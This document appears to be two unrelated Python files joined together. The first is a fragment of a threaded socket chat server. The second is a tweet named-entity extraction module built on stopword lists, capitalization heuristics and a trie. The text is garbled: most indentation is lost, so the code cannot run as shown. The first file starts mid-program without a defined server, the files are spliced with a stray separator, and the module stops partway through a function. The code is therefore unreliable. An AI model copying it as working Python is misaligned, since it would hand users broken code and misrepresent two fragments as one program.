def handle_sock(sock, addr):
    # receive up to 1K of data at a time
data = sock.recv(1024)
print(data.decode('utf8'))
re_data = input()
# byte -> decode -> str -> encode -> byte
sock.send(re_data.encode('utf8'))
# On its own, this server could only handle one client at a time,
# so how can we support connections from multiple users?
# With multithreading.
while True:
    # accept a new connection from a client
sock, addr = server.accept()
client_thread = threading.Thread(target=handle_sock, args=(sock, addr))
client_thread.start()
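# Illustrative sketch only (not part of the original server): a minimal, hypothetical client for the
# threaded server above; run it from another terminal, replacing the placeholder address as needed.
# import socket
# client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# client.connect(('127.0.0.1', 8000))        # placeholder address; use the server machine's IP
# client.send("hello server".encode('utf8'))
# print(client.recv(1024).decode('utf8'))    # prints whatever reply is typed on the server side
# client.close()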
|
SatadishaModule_final_trie.py
|
# coding: utf-8
# In[298]:
import sys
import re
import string
import csv
import random
import time
#import binascii
#import shlex
import numpy as np
import pandas as pd
from itertools import groupby
from operator import itemgetter
from collections import OrderedDict
from collections.abc import Iterable
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk.corpus import stopwords
from scipy import stats
#from datasketch import MinHash, MinHashLSH
import NE_candidate_module as ne
import Mention
import threading, queue
import time
import datetime
import copy
import trie as trie
# In[324]:
#---------------------Existing Lists--------------------
cachedStopWords = stopwords.words("english")
tempList=["i","and","or","other","another","across","were","you","then","still","is","while","till","nor","perhaps","otherwise","until","sometimes","sometime","seem","cannot","seems","because","can","like","into","able","unable","either","neither","if","we","it","else","elsewhere","how","not","what","who","when","where","where's","where’s","where'd","where’d","where'll","where’ll","who's","who’s","he's","he’s","he’d","he'd","she's","she’s","she’d","she'd","let","today","tomorrow","tonight","let's","let’s","lets","know","make","oh","via","i","yet","must","mustnt","mustn't","mustn’t","i'll","i’ll","you'll","you’ll","we'll","we’ll","done","doesnt","doesn't","doesn’t","dont","don't","don’t","did","didnt","didn't","didn’t","much","without","could","couldn't","couldn’t","would","wouldn't","wouldn’t","should","shouldn't","shouldn’t","shall","isn't","isn’t","hasn't","hasn’t","was","wasn't","wasn’t","also","let's","let’s","let","well","just","everyone","anyone","noone","none","someone","theres","there's","there’s","everybody","nobody","somebody","anything","else","elsewhere","something","nothing","everything","i'd","i’d","i’m","won't","won’t","i’ve","i've","they're","they’re","we’re","we're","we'll","we’ll","we’ve","we've","they’ve","they've","they’d","they'd","they’ll","they'll","again","you're","you’re","you've","you’ve","thats","that's",'that’s','here’s',"here's","what's","what’s","i’m","i'm","a","so","except","arn't","aren't","arent","this","when","it","it’s","it's","he's","she's","she'd","he'd","he'll","she'll","she’ll","many","can't","cant","can’t","werent","weren't","were’t","even","yes","no","these","here","there","to","maybe","<hashtag>","<hashtag>.","ever","every","never","there's","there’s","whenever","wherever","however","whatever","always"]
prep_list=["in","at","of","on","with","by","&;"] #includes common conjunction as well
article_list=["a","an","the"]
day_list=["sunday","monday","tuesday","wednesday","thursday","friday","saturday","mon","tues","wed","thurs","fri","sat","sun"]
month_list=["january","february","march","april","may","june","july","august","september","october","november","december","jan","feb","mar","apr","may","jun","jul","aug","sep","oct","nov","dec"]
for item in tempList:
if item not in cachedStopWords:
cachedStopWords.append(item)
cachedStopWords.remove("don")
#cachedStopWords.remove("may")
cachedTitles = ["mr.","mr","mrs.","mrs","miss","ms","sen.","dr","dr.","prof.","president","congressman"]
chat_word_list=["please","4get","ooh","idk","oops","yup","stfu","uhh","2b","dear","yay","btw","ahhh","b4","ugh","ty","cuz","coz","sorry","yea","asap","ur","bs","rt","lfmao","slfmao","u","r","nah","umm","ummm","thank","thanks","congrats","whoa","rofl","ha","ok","okay","hey","hi","huh","ya","yep","yeah","fyi","duh","damn","lol","omg","congratulations","fuck","wtf","wth","aka","wtaf","xoxo","rofl","imo","wow","fck","haha","hehe","hoho"]
#string.punctuation.extend('“','’','”')
#---------------------Existing Lists--------------------
# In[300]:
class SatadishaModule():
def __init__(self):
print("hello")
#self.batch=batch
#self.batch=self.batch[:3000:]
self.counter=0
#self.extract()
def flatten(self,mylist, outlist,ignore_types=(str, bytes, int, ne.NE_candidate)):
if mylist !=[]:
for item in mylist:
#print not isinstance(item, ne.NE_candidate)
if isinstance(item, list) and not isinstance(item, ignore_types):
self.flatten(item, outlist)
else:
if isinstance(item,ne.NE_candidate):
item.phraseText=item.phraseText.strip(' \t\n\r')
item.reset_length()
else:
if type(item)!= int:
item=item.strip(' \t\n\r')
outlist.append(item)
return outlist
def normalize(self,word):
strip_op=word
strip_op=(((strip_op.lstrip(string.punctuation)).rstrip(string.punctuation)).strip()).lower()
strip_op=(strip_op.lstrip('“‘’”')).rstrip('“‘’”')
#strip_op= self.rreplace(self.rreplace(self.rreplace(strip_op,"'s","",1),"’s","",1),"’s","",1)
if strip_op.endswith("'s"):
li = strip_op.rsplit("'s", 1)
return ''.join(li)
elif strip_op.endswith("’s"):
li = strip_op.rsplit("’s", 1)
return ''.join(li)
else:
return strip_op
#@profile
def extract(self,batch,batch_number):
#df = read_csv('eric_trump.csv', index_col='ID', header=0, encoding='utf-8')
print("Phase I extracting now")
time_in=time.time()
self.batch=batch
#output.csv
#df_out= DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'usertype', 'TweetSentence', 'phase1Candidates'))
self.df_out= pd.DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'TweetSentence', 'phase1Candidates','start_time','entry_batch','annotation'))
if(self.counter==0):
#self.df_out= pd.DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'TweetSentence', 'phase1Candidates','correct_candidates_tweet'))
#dict1 = {'tweetID':0, 'sentID':0, 'hashtags':'first', 'user':'user', 'TweetSentence':'sentence', 'phase1Candidates':'phase1Out','start_time':'now','entry_batch':'batch_number'}
self.CTrie=trie.Trie("ROOT")
self.ME_EXTR=Mention.Mention_Extraction()
self.phase2stopWordList=[]
#self.df_out= pd.DataFrame({'tweetID':0, 'sentID':0, 'hashtags':'first', 'user':'user', 'TweetSentence':'sentence', 'phase1Candidates':'phase1Out','start_time':'now','entry_batch':'batch_number'}, index=[0,])
#%%timeit -o
#module_capital_punct.main:
'''I am running this for 100 iterations for testing purposes. Of course you no longer need this for loop as you are
#running one tuple at a time'''
#if(self.counter==0):
#initializing candidateBase with a dummy node
#self.interCWSGap={}
#candidateBase={}
#NE_container=DataFrame(columns=('candidate', 'frequency', 'capitalized', 'start_of_sentence', 'abbreviation', 'all_capitalized','is_csl','title','has_number','date_indicator','is_apostrophed','has_intermediate_punctuation','ends_like_verb','ends_like_adverb','change_in_capitalization','has_topic_indicator'))
count=0
ne_count=0
userMention_count=0
#token_count=0
NE_list_phase1=[]
UserMention_list=[]
df_holder=[]
#--------------------------------------PHASE I---------------------------------------------------
for index, row in self.batch.iterrows():
now = datetime.datetime.now()
#now=str(now.hour)+":"+str(now.minute)+":"+str(now.second)
#hashtags=str(row['Discussion'])
hashtags=str(row['HashTags'])
user=str(row['User'])
#userType=str(row['User Type'])
tweetText=str(row['TweetText'])
#correct_candidates_tweet=str(row['Mentions'])
#print(str(index))
annot_raw=str(row['mentions_other'])
split_list=annot_raw.split(";")
#split_listFilter=list(filter(lambda element: element.strip()!='', split_list))
split_listFilter=list(filter(None, split_list))
#annotations in list of list structure
filtered_2_times=list(map(lambda element: list(filter(None, element.split(','))), split_list))
#capitalization module
#if all words are capitalized:
# print(index)
# if tweetText.isupper():
# print(index,tweetText)
# dict1 = {'tweetID':str(index), 'sentID':str(0), 'hashtags':hashtags, 'user':user, 'TweetSentence':tweetText, 'phase1Candidates':"nan",'start_time':now,'entry_batch':batch_number,'annotation':filtered_2_times[0]}
# df_holder.append(dict1)
# elif tweetText.islower():
# print(index,tweetText)
# print("",end="")
# dict1 = {'tweetID':str(index), 'sentID':str(0), 'hashtags':hashtags, 'user':user, 'TweetSentence':tweetText, 'phase1Candidates':"nan",'start_time':now,'entry_batch':batch_number,'annotation':filtered_2_times[0]}
# df_holder.append(dict1)
#else:
ne_List_final=[]
userMention_List_final=[]
#pre-modification: returns word list split at whitespaces; retains punctuation
tweetSentences=list(filter (lambda sentence: len(sentence)>1, tweetText.split('\n')))
tweetSentenceList_inter=self.flatten(list(map(lambda sentText: sent_tokenize(sentText.lstrip().rstrip()),tweetSentences)),[])
tweetSentenceList=list(filter (lambda sentence: len(sentence)>1, tweetSentenceList_inter))
#filtering nan values
if(len(filtered_2_times[0])==1):
if(filtered_2_times[0][0]=='nan'):
filtered_2_times[0]=[]
# print(index,filtered_2_times,tweetSentenceList)
for sen_index in range(len(tweetSentenceList)):
sentence=tweetSentenceList[sen_index]
modified_annotations=[self.normalize(candidate)for candidate in filtered_2_times[sen_index]]
annotation=[]
for candidate in modified_annotations:
if(candidate=="nan"):
pass
else:
annotation.append(candidate)
# for i in filtered_2_times[sen_index]:
# if(i=="nan"):
#print(sentence)
#print(sen_index)
#tweetWordList= list(filter(lambda word:(word.strip(string.punctuation))!="",sentence.split()))
phase1Out=""
if((not tweetText.isupper()) &(not tweetText.islower())):
tempList=[]
tempWordList=sentence.split()
#print(tempWordList)
for word in tempWordList:
temp=[]
# if(temp1):
# temp=list(map(lambda elem: elem+'..', temp1[:-1]))
# temp.append(temp1[-1])
if (("?" in word)&(not word.endswith("?"))):
temp1=list(filter(lambda elem: elem!='',word.split("?")))
if(temp1):
temp=list(map(lambda elem: elem+'?', temp1[:-1]))
temp.append(temp1[-1])
elif ((":" in word)&(not word.endswith(":"))):
temp1=list(filter(lambda elem: elem!='',word.split(":")))
if(temp1):
temp=list(map(lambda elem: elem+':', temp1[:-1]))
temp.append(temp1[-1])
elif (("," in word)&(not word.endswith(","))):
#temp=list(filter(lambda elem: elem!='',word.split(",")))
temp1=list(filter(lambda elem: elem!='',word.split(",")))
if(temp1):
temp=list(map(lambda elem: elem+',', temp1[:-1]))
temp.append(temp1[-1])
elif (("/" in word)&(not word.endswith("/"))):
temp1=list(filter(lambda elem: elem!='',word.split("/")))
if(temp1):
temp=list(map(lambda elem: elem+'/', temp1[:-1]))
temp.append(temp1[-1])
elif "..." in word:
#print("here")
temp=list(filter(lambda elem: elem!='',word.split("...")))
# if(temp1):
# temp=list(map(lambda elem: elem+'...', temp1[:-1]))
# temp.append(temp1[-1])
elif ".." in word:
temp=list(filter(lambda elem: elem!='',word.split("..")))
#print(index, temp)
else:
#if word not in string.punctuation:
temp=[word]
if(temp):
tempList.append(temp)
tweetWordList=self.flatten(tempList,[])
#print(tweetWordList)
#token_count+=len(tweetWordList)
#returns position of words that are capitalized
#print(tweetWordList)
tweetWordList_cappos = list(map(lambda element : element[0], filter(lambda element : self.capCheck(element[1]), enumerate(tweetWordList))))
#print(tweetWordList_cappos)
#returns list of stopwords in tweet sentence
combined_list_here=([]+cachedStopWords+article_list+prep_list+chat_word_list)
#combined_list_here.remove("the")
tweetWordList_stopWords=list(filter(lambda word: ((word[0].islower()) & (((word.strip()).strip(string.punctuation)).lower() in combined_list_here))|(word.strip() in string.punctuation)|(word.startswith('@')), tweetWordList))
#returns list of @userMentions
userMentionswPunct=list(filter(lambda phrase: phrase.startswith('@'), tweetWordList))
userMentions=list(map(lambda mention: mention.rstrip(string.punctuation), userMentionswPunct))
userMention_count+=len(userMentions)
userMention_List_final+=userMentions
'''#function to process and store @ user mentions---- thread 1
#print(userMention_List_final)
threading.Thread(target=self.ME_EXTR.ComputeAll, args=(userMention_List_final,)).start()'''
#non @usermentions are processed in this function to find non @, non hashtag Entities---- thread 2
ne_List_allCheck=[]
#if(len(tweetWordList)>len(tweetWordList_cappos)):
#print(len(tweetWordList),str(len(tweetWordList_cappos)),str(len(tweetWordList_stopWords)))
if((len(tweetWordList))>(len(tweetWordList_cappos))):
#q = queue.Queue()
#threading.Thread(target=self.trueEntity_process, args=(tweetWordList_cappos,tweetWordList,q)).start()
ne_List_allCheck= self.trueEntity_process(tweetWordList_cappos,tweetWordList)
#ne_List_allCheck= q.get()
ne_count+=len(ne_List_allCheck)
ne_List_final+=ne_List_allCheck
#write row to output dataframe
if(len(tweetWordList)==len(tweetWordList_cappos)):
phase1Out="nan"
if(len(ne_List_allCheck)>0):
for candidate in ne_List_allCheck:
position = '*'+'*'.join(str(v) for v in candidate.position)
position=position+'*'
candidate.set_sen_index(sen_index)
phase1Out+=(((candidate.phraseText).lstrip(string.punctuation)).strip())+ '::'+str(position)+"||"
else:
phase1Out="nan"
#print(self.df_out.columns)
dict1 = {'tweetID':str(index), 'sentID':str(sen_index), 'hashtags':hashtags, 'user':user, 'TweetSentence':sentence, 'phase1Candidates':phase1Out,'start_time':now,'entry_batch':batch_number,'annotation':annotation}
df_holder.append(dict1)
#self.df_out.append(outrow)
#self.df_out=self.df_out.append(outrow,ignore_index=True)
for candidate in ne_List_final:
#self.insert_dict (candidate,self.NE_container,candidateBase,index,candidate.sen_index,batch_number)
candidateText=(((candidate.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip(' \t\n\r')).lower()
candidateText=(candidateText.lstrip('“‘’”')).rstrip('“‘’”')
candidateText= self.rreplace(self.rreplace(self.rreplace(candidateText,"'s","",1),"’s","",1),"’s","",1)
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
if not ((candidateText in combined)|(candidateText.isdigit())|(self.is_float(candidateText))):
self.CTrie.__setitem__(candidateText.split(),len(candidateText.split()),candidate.features,batch_number)
if(index==191):
print(sentence)
self.printList(ne_List_final)
#if(userMention_List_final):
# print(userMention_List_final)
NE_list_phase1+=ne_List_final
UserMention_list+=userMention_List_final
#print ("\n")
#fieldnames=['candidate','freq','length','cap','start_of_sen','abbrv','all_cap','is_csl','title','has_no','date','is_apostrp','has_inter_punct','ends_verb','ends_adverb','change_in_cap','topic_ind','entry_time','entry_batch','@mention']
#updated_NE_container=[]
'''#Updating trie with @mention info
self.CTrie.updateTrie("",self.ME_EXTR)'''
time_out=time.time()
#for display purposes Iterating through the trie
'''candidateBase= self.CTrie.__iter__()
for node in candidateBase:
print(node)'''
'''for key in self.NE_container.keys():
val=self.NE_container[key]+[str(ME_EXTR.checkInDictionary(key))]
#index+=1
#updated_NE_container[key]=val
dict1 = {'candidate':key, 'freq':val[0],'length':val[1],'cap':val[2],'start_of_sen':val[3],'abbrv':val[4],'all_cap':val[5],'is_csl':val[6],'title':val[7],'has_no':val[8],'date':val[9],'is_apostrp':val[10],'has_inter_punct':val[11],'ends_verb':val[12],'ends_adverb':val[13],'change_in_cap':val[14],'topic_ind':val[15],'entry_time':val[16],'entry_batch':val[17],'@mention':val[18]}
updated_NE_container.append(dict1)'''
'''with open('candidate_base.csv', 'w') as output_candidate:
#with open('candidates.csv', 'w') as output_candidate:
writer = csv.writer(output_candidate)
writer.writerow(fieldnames)
for k, v in updated_NE_container.items():
writer.writerow([k] + v)'''
#print("Total number of tokens processed: "+str(token_count))
#print ("Total number of candidate NEs extracted: "+str(len(candidateBase)))
#print(self.NE_container.items())
#freqs=pd.read_csv('candidate_base.csv', encoding = 'utf-8',delimiter=',')
#freqs = pd.DataFrame(updated_NE_container, columns=fieldnames)
#freqs = pd.DataFrame()
#freqs=pd.DataFrame(list(self.NE_container.items()), orient='index')#columns=fieldnames)
self.append_rows(df_holder)
self.counter=self.counter+1
#return (copy.deepcopy(self.df_out),copy.deepcopy(freqs),time_in,time_out)
return (self.df_out,self.CTrie,time_in,time_out,self.phase2stopWordList)
#return sorted_candidateBase
#@profile
def append_rows(self,df_holder):
df = pd.DataFrame(df_holder)
self.df_out=self.df_out.append(df)
self.df_out.to_csv('tweet_base.csv' ,sep=',', encoding='utf-8')
def rreplace(self,s, old, new, occurrence):
if s.endswith(old):
li = s.rsplit(old, occurrence)
return new.join(li)
else:
return s
def stopwordReplace(self, candidate):
combined=cachedStopWords+prep_list+article_list+day_list+chat_word_list
if(candidate.features[ne.is_quoted]):
words=self.normalize(candidate.phraseText).split()
flag=False
swList=[]
for word in words:
if(word in combined):
swList.append(word)
else:
flag=True
#print(candidate.phraseText,swList,flag)
if(flag):
self.phase2stopWordList=list(set(self.phase2stopWordList)|set(swList))
#self.phase2stopWordList.extend(swList)
else:
candidate.phraseText=""
return candidate
wordlist=list(filter(lambda word: word!='', candidate.phraseText.split()))
pos=candidate.position
#print(candidate.phraseText,wordlist,pos)
start=0
flag=False
while(start!=len(pos)):
if(wordlist[start].lstrip(string.punctuation).rstrip(string.punctuation).strip().lower() not in combined):
#flag=True
break
start+=1
end=len(pos)-1
while(end>=0):
#print(wordlist[end])
if(wordlist[end].lstrip(string.punctuation).rstrip(string.punctuation).strip() not in combined):
#flag=True
break
end-=1
#print(start,end)
updated_pos=pos[start:(end+1)]
updated_phrase=' '.join(wordlist[start:(end+1)])
#print(updated_pos,updated_phrase)
candidate.phraseText=updated_phrase
candidate.position=updated_pos
return candidate
# In[301]:
#candidate: 'frequency','length', 'capitalized', 'start_of_sentence', 'abbreviation', 'all_capitalized','is_csl','title','has_number','date_indicator','is_apostrophed','has_intermediate_punctuation','ends_like_verb','ends_like_adverb','change_in_capitalization','has_topic_indicator'
def is_float(self,string):
try:
f=float(string)
if(f==0.0):
return True
else:
return ((f) and (string.count(".")==1))
#return True# True if string is a number with a dot
except ValueError: # if string is not a number
return False
def insert_dict(self,candidate,NE_container,candidateBase,tweetID,sentenceID,batch):
key=(((candidate.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip(' \t\n\r')).lower()
key=(key.lstrip('“‘’”')).rstrip('“‘’”')
key= self.rreplace(self.rreplace(self.rreplace(key,"'s","",1),"’s","",1),"’s","",1)
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
try:
if ((key in combined)|(key.isdigit())|(self.is_float(key))):
return
except TypeError:
print(key)
tweetID=str(tweetID)
sentenceID=str(sentenceID)
if key in self.NE_container:
feature_list=self.NE_container[key]
feature_list[0]+=1
for index in [0,1,2,3,4,5,6,7,9,10,11,13,14]:
if (candidate.features[index]==True):
feature_list[index+2]+=1
for index in [8,12]:
if (candidate.features[index]!=-1):
feature_list[index+2]+=1
else:
now = datetime.datetime.now()
now=str(now.hour)+":"+str(now.minute)+":"+str(now.second)
feature_list=[0]*17
feature_list[0]+=1
feature_list[1]=candidate.length
            #call background process to check for non-capitalized occurrences
for index in [0,1,2,3,4,5,6,7,9,10,11,13,14]:
if (candidate.features[index]==True):
feature_list[index+2]+=1
for index in [8,12]:
if (candidate.features[index]!=-1):
feature_list[index+2]+=1
feature_list.append(now)
feature_list.append(batch)
self.NE_container[key] = feature_list
#insert in candidateBase
'''if key in candidateBase.keys():
#candidateBase[key]=candidateBase[key]+[str(tweetID)+":"+str(sentenceID)]
if(tweetID in candidateBase[key]):
if(sentenceID in candidateBase[key][tweetID] ):
candidateBase[key][tweetID][sentenceID]=candidateBase[key][tweetID][sentenceID]+1
else:
candidateBase[key][tweetID][sentenceID]=1
else:
candidateBase[key][tweetID]={}
candidateBase[key][tweetID][sentenceID]=1
#c=[(y,str(idx)) for idx,y in enumerate( a) if y not in b]
#candidateBase[key]
else:
#candidateBase[key]=[str(tweetID)+":"+str(sentenceID)]
candidateBase[key]={}
candidateBase[key][tweetID]={}
candidateBase[key][tweetID][sentenceID]=1'''
return
# In[302]:
    def printList(self,mylist):
        print("[", end="")
        for item in mylist:
            if item != None:
                if isinstance(item,ne.NE_candidate):
                    item.print_obj()
                    #print (item.phraseText)
                else:
                    print(item+",", end="")
        print("]")
        return
# In[303]:
# In[304]:
def consecutive_cap(self,tweetWordList_cappos,tweetWordList):
output=[]
#identifies consecutive numbers in the sequence
#print(tweetWordList_cappos)
for k, g in groupby(enumerate(tweetWordList_cappos), lambda element: element[0]-element[1]):
output.append(list(map(itemgetter(1), g)))
count=0
if output:
final_output=[output[0]]
for first, second in (zip(output,output[1:])):
#print(first,second)
#print(tweetWordList[first[-1]])
if ((not (tweetWordList[first[-1]]).endswith('"'))&((second[0]-first[-1])==2) & (tweetWordList[first[-1]+1].lower() in prep_list)):
(final_output[-1]).extend([first[-1]+1]+second)
elif((not (tweetWordList[first[-1]].endswith('"')))&((second[0]-first[-1])==3) & (tweetWordList[first[-1]+1].lower() in prep_list)& (tweetWordList[first[-1]+2].lower() in article_list)):
(final_output[-1]).extend([first[-1]+1]+[first[-1]+2]+second)
else:
final_output.append(second)
#merge_positions.append(False)
else:
final_output=[]
return final_output
# In[305]:
#basically splitting the original NE_candidate text and building individual object from each text snippet
def build_custom_NE(self,phrase,pos,prototype,feature_index,feature_value):
#print("Enters")
position=pos
custom_NE= ne.NE_candidate(phrase,position)
for i in range(15):
custom_NE.set_feature(i,prototype.features[i])
custom_NE.set_feature(feature_index,feature_value)
if (feature_index== ne.is_csl) & (feature_value== True):
custom_NE.set_feature(ne.start_of_sentence, False)
custom_NE=self.entity_info_check(custom_NE)
return custom_NE
# In[306]:
def abbrv_algo(self,ne_element):
        '''abbreviation algorithm:
        trailing punctuation present:
            ends with a period:
                short multiple letter-period sequence (e.g. "U.S.") -> abbreviation
                otherwise -> drop the trailing period
            other trailing punctuation -> drop it
        no trailing punctuation:
            short all-caps token, or a letter.period.letter pattern with no spaces -> abbreviation
            otherwise unchanged
        '''
phrase= ne_element.phraseText
#print("=>"+phrase)
#since no further split occurs we can set remaining features now
ne_element.set_feature(ne.capitalized, True)
if ne_element.phraseText.isupper():
ne_element.set_feature(ne.all_capitalized, True)
else:
ne_element.set_feature(ne.all_capitalized, False)
abbreviation_flag=False
p=re.compile(r'[^a-zA-Z\d\s]$')
match_list = p.findall(phrase)
if len(match_list)>0:
#print("Here")
if phrase.endswith('.'):
#print("Here")
p1= re.compile(r'([a-zA-Z][\.]\s*)')
match_list = p1.findall(phrase)
if ((len(match_list)>1) & (len(phrase)<6)):
#print ("1. Found abbreviation: "+phrase)
abbreviation_flag= True
else:
if (phrase[-2]!=' '):
phrase= phrase[:-1]
else:
#if phrase.endswith(string.punctuation):
if (phrase[-2]!=' '):
phrase= phrase[:-1]
#if not (phrase.endswith('?')|phrase.endswith('!')|phrase.endswith(')')|phrase.endswith('>')):
#phrase= phrase[:-1]
else:
p2=re.compile(r'([^a-zA-Z0-9_\s])')
match_list = p2.findall(phrase)
if ((len(match_list)==0) & (phrase.isupper()) & (len(phrase)<7)& (len(phrase)>1)):
#print ("2. Found abbreviation!!: "+phrase)
abbreviation_flag= True
else:
#print("Here-> "+phrase)
p3= re.compile(r'([A-Z][.][A-Z])')
p4= re.compile(r'\s')
match_list = p3.findall(phrase)
match_list1 = p4.findall(phrase)
if ((len(match_list)>0) & (len(match_list1)==0)):
abbreviation_flag= True
#print ("3. Found abbreviation!!: "+phrase)
#element= ne.NE_candidate(phrase.strip())
ne_element.phraseText=phrase
ne_element.reset_length()
ne_element.set_feature(ne.abbreviation, abbreviation_flag)
return ne_element
# In[307]:
def punct_clause(self,NE_phrase_in):
NE_phrases=self.entity_info_check(NE_phrase_in)
cap_phrases=NE_phrases.phraseText.strip()
final_lst=[]
#print (cap_phrases,NE_phrases.features[ne.date_indicator])
if (re.compile(r'[^a-zA-Z0-9_\s]')).findall(cap_phrases):
#case of intermediate punctuations: handles abbreviations
p1= re.compile(r'(?:[a-zA-Z0-9][^a-zA-Z0-9_\s]\s*)')
match_lst = p1.findall(cap_phrases)
#print(match_lst)
if match_lst:
index= (list( p1.finditer(cap_phrases) )[-1]).span()[1]
p= re.compile(r'[^a-zA-Z\d\s]')
match_list = p.findall(cap_phrases)
p2=re.compile(r'[^a-zA-Z\d\s]$') #ends with punctuation
if ((len(match_list)>0)&(len(match_lst)>0)&((len(match_list)-len(match_lst))>0)):
if (p2.findall(cap_phrases)):
#only strips trailing punctuations, not intermediate ones following letters
cap_phrases = cap_phrases[0:index]+re.sub(p, '', cap_phrases[index:])
NE_phrases.phraseText= cap_phrases
#comma separated NEs
#lst=filter(lambda(word): word!="", re.split('[,]', cap_phrases))
#print ("=>"+ cap_phrases)
start_of_sentence_fix=NE_phrases.features[ne.start_of_sentence]
#temp=re.split("\...", cap_phrases)
#inter=self.flatten(list(map(lambda elem: re.split('[,:!…]',elem),temp)),[])
#print("'''",inter)
combined=cachedStopWords+prep_list+article_list+day_list+chat_word_list
splitList=re.split('["‘’“”()/,;:!?…]',cap_phrases)
splitList=list(filter(lambda word: ((word!="")&(word.lstrip(string.punctuation).rstrip(string.punctuation).strip().lower() not in combined)), splitList))
#print("==",splitList)
wordlstU=list(map(lambda word: word.strip().strip(string.punctuation), splitList))
wordlstU=list(filter(lambda word: word!="", wordlstU))
wordlst=list(filter(lambda word: ((word.strip().strip(string.punctuation))[0].isupper()|(word.strip().strip(string.punctuation))[0].isdigit()), wordlstU))
#print(":::",wordlst)
if ((NE_phrases.features[ne.date_indicator]==False)):
#print("hehe")
if(len(splitList)>1):
if(len(wordlst)>0):
#print("here::")
pos=NE_phrases.position
combined=[]
prev=0
for i in range(len(wordlst)):
word=wordlst[i]
word_len=len(list(filter(lambda individual_word: individual_word!="", re.split('[ ]', word))))
word_pos=pos[(prev):(prev+word_len)]
prev=prev+word_len
combined+=[[word]+word_pos]
lst_nsw=list(filter(lambda element: (((str(element[0])).strip(string.punctuation).lower() not in combined)& (not (str(element[0])).strip(string.punctuation).isdigit()) & (len(str(element[0]))>1)) ,combined))
#print ("++",lst_nsw)
if(lst_nsw):
final_lst= list(map(lambda element:self.build_custom_NE(str(element[0]),element[1:],NE_phrases,ne.is_csl,True), lst_nsw))
final_lst[0].set_feature(ne.start_of_sentence, NE_phrases.features[ne.start_of_sentence])
else:
final_lst=[]
else:
NE_phrases.set_feature(ne.is_csl,False)
final_lst=[NE_phrases]
else:
NE_phrases.set_feature(ne.is_csl,False)
final_lst=[NE_phrases]
#check abbreviation
#print("++",final_lst)
if(final_lst):
final_lst= list(map(lambda phrase: self.abbrv_algo(phrase), final_lst))
#print(lst)
return final_lst
# In[308]:
#%%timeit -o
def f(self,y,sflag,quoteFlag,tweetWordList):
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
#print(sflag)
if sflag:
left=""
right=""
lp=(-1)
rp=(-1)
i=0
j=len(y)-1
flag1=False
flag2=False
x=[]
while (((flag1==False)|(flag2==False))&((j-i)>0)):
if(flag1==False):
left=(((tweetWordList[y[i]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(left not in combined):
flag1=True
lp=i
else:
i+=1
if(flag2==False):
right=(((tweetWordList[y[j]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(right not in combined):
flag2=True
rp=j
else:
j-=1
#print(flag1,flag2)
#if((flag1==False)|(flag2==False)):
# while (((j-i)!=0)|((flag1==False)|(flag2==False))):
if(flag1==False):
left=(((tweetWordList[y[i]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
#print(left)
if(left not in combined):
flag1=True
lp=i
else:
i+=1
if(flag2==False):
right=(((tweetWordList[y[j]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(right not in combined):
flag2=True
rp=j
else:
j-=1
#print(lp,rp)
if(lp==rp):
if(lp!=-1):
x=[y[lp]]
else:
x=y[lp:(rp+1)]
else:
x=y
#print(x)
if(x):
list1=list(map(lambda word: tweetWordList[word], x))
phrase=" ".join(e for e in list1)
#print(phrase)
phrase1="".join(list1)
#if not ((phrase[0].isdigit()) & (len(x)==1)):
if not (phrase1.strip().isdigit()):
NE_phrase= ne.NE_candidate(phrase.strip(),x)
if 0 in x:
NE_phrase.set_feature(ne.start_of_sentence,True)
else:
NE_phrase.set_feature(ne.start_of_sentence,False)
NE_phrase.set_feature(ne.is_quoted,quoteFlag)
else:
NE_phrase= ne.NE_candidate("JUST_DIGIT_ERROR",[])
else:
NE_phrase= ne.NE_candidate("JUST_DIGIT_ERROR",[])
#print("====>>",NE_phrase.phraseText)
return NE_phrase
# In[309]:
def capCheck(self,word):
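        # Decide whether a token counts as "capitalized" for run detection: @mentions and hashtag
        # placeholders never do, stopwords/prepositions/articles and digit-initial tokens always do,
        # otherwise the first alphabetic character must be upper case.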
combined_list=[]+cachedStopWords+prep_list+chat_word_list+article_list
if word.startswith('@'):
return False
elif "<Hashtag" in word:
return False
#elif (((word.strip('“‘’”')).lstrip(string.punctuation)).rstrip(string.punctuation)).lower() in combined_list:
elif (((word.strip('“‘’”')).lstrip(string.punctuation)).rstrip(string.punctuation)) in combined_list:
# if((word=="The")|(word=="THE")):
# return True
# else:
return True
elif word[0].isdigit():
return True
else:
p=re.compile(r'^[\W]*[A-Z]')
l= p.match(word)
if l:
return True
else:
return False
# In[310]:
def title_check(self,ne_phrase):
title_flag=False
words=ne_phrase.phraseText.split()
for word in words:
if word.lower() in cachedTitles:
title_flag= True
break
ne_phrase.set_feature(ne.title,title_flag)
return ne_phrase
# In[311]:
def entity_info_check(self,ne_phrase):
flag1=False #has number
flag3=False
flag_ind=[] #is number
month_ind=[]
date_num_holder=[]
words=ne_phrase.phraseText.split()
for word in words:
word=(word.strip()).rstrip(string.punctuation).lower()
punct_flag=False
for char in word:
if ((char in string.punctuation)|(char in ['“','‘','’','”','…'])):
punct_flag=True
break
#if ((not word.isalpha())& (not "'s" in word) & (not "’s" in word)):'‘“"’”
if ((not word.isalpha())& (not punct_flag)):
flag_ind+=[True]
if word.isdigit():
date_num_holder+=['num']
else:
date_num_holder+=['alpha']
else:
flag_ind+=[False]
if word in month_list:
month_ind+=[True]
date_num_holder+=['month']
elif word in day_list:
date_num_holder+=['day']
elif word in prep_list:
date_num_holder+=['preposition']
elif word in article_list:
date_num_holder+=['article']
else:
#print("=>"+word)
date_num_holder+=['string']
if True in flag_ind:
flag1=True
if True in month_ind:
flag3=True
